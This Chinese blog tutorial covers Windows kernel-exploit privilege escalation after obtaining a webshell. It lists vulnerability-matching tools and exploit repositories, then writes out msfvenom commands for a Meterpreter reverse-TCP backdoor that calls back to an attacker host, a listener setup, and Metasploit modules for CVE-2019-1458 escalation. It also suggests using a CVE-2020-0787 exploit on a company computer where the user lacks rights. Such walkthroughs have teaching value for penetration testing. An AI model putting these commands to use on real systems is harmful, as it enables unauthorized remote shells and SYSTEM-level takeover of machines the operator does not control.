win内核漏洞提权
2022/4/3 6:23:21
本文主要是介绍win内核漏洞提权,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
WIN系统溢出漏洞提权
漏洞筛选
在整个提权项目中,前提是拿到webshell。
关于系统的溢出漏洞,我推荐两个项目:
https://github.com/chroblert/WindowsVulnScan
WindowsVulnScan使用
首先用powershell执行ps1文件,在本地会生成json文件来存放系统补丁信息
json文件
python cve-check.py -C -f KB.json
然后在执行py文件,它会将可用的exp显示出来。
https://github.com/bitsadmin/wesng
wesng使用
在目标机上执行systeminfo命令
然后将获取到的信息复制到脚本同一目录下的system.txt中。
执行命令 python wes.py system.txt -o vulns.csv
漏洞补丁编号&系统版本对比筛选
基于漏洞文件-溢出漏洞提权辅助项目测评-定位
推荐项目:
https://github.com/Ascotbe/KernelHub 针对常用溢出编号指定找EXP
https://github.com/nomi-sec/PoC-in-GitHub 针对年份及编号指定找EXP
https://github.com/offensive-security/exploitdb 针对类型及关键说明指定找EXP
)https://github.com/SecWiki/windows-kernel-exploits 项目收集的EXP
基于Webshell-溢出漏洞提权利用平台msf测评
不同脚本Webshell权限不一致,一般jsp java权限默认系统权限,php aspx asp普通低权限。
先用msf生成一个后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=3333 -f exe -o msf.exe
设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit
我用的是虚拟机win7,当的靶机,为了方便,我就直接执行后门了。
上线,获得低权限。
使用自带模块提权use multi/recon/local_exploit_suggester
找到可利用cve漏洞
使用exp use windows/local/cve_2019_1458_wizardopium
设置session会话 session 2
获得最高权限
基于本地用户-溢出漏洞提权
CVE-2020-0787提权
在某些环境下,比如一个公司中,你拥有一台公司电脑,但是你权限不够,就可以试试该方法。
使用该exp:BitsArbitraryFileMoveExploit.exe
如果主机没打补丁,就可能利用成功。
跳出cmd窗口,获得system权限。
这篇关于win内核漏洞提权的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)
- 2024-05-30【Java】百万数据excel导出功能如何实现
- 2024-05-30我们小公司,哪像华为一样,用得上IPD(集成产品开发)?
- 2024-05-30java excel上传--poi
- 2024-05-30安装笔记本应用商店的pycharm,再安排pandas等模块,说是没有打包工具?
- 2024-05-29java11新特性
- 2024-05-29哪些无用敏捷指标正在破坏敏捷转型?
- 2024-05-29鸿蒙原生应用再新丁!新华社 入局鸿蒙
- 2024-05-29设计模式 之 迭代器模式(Iterator)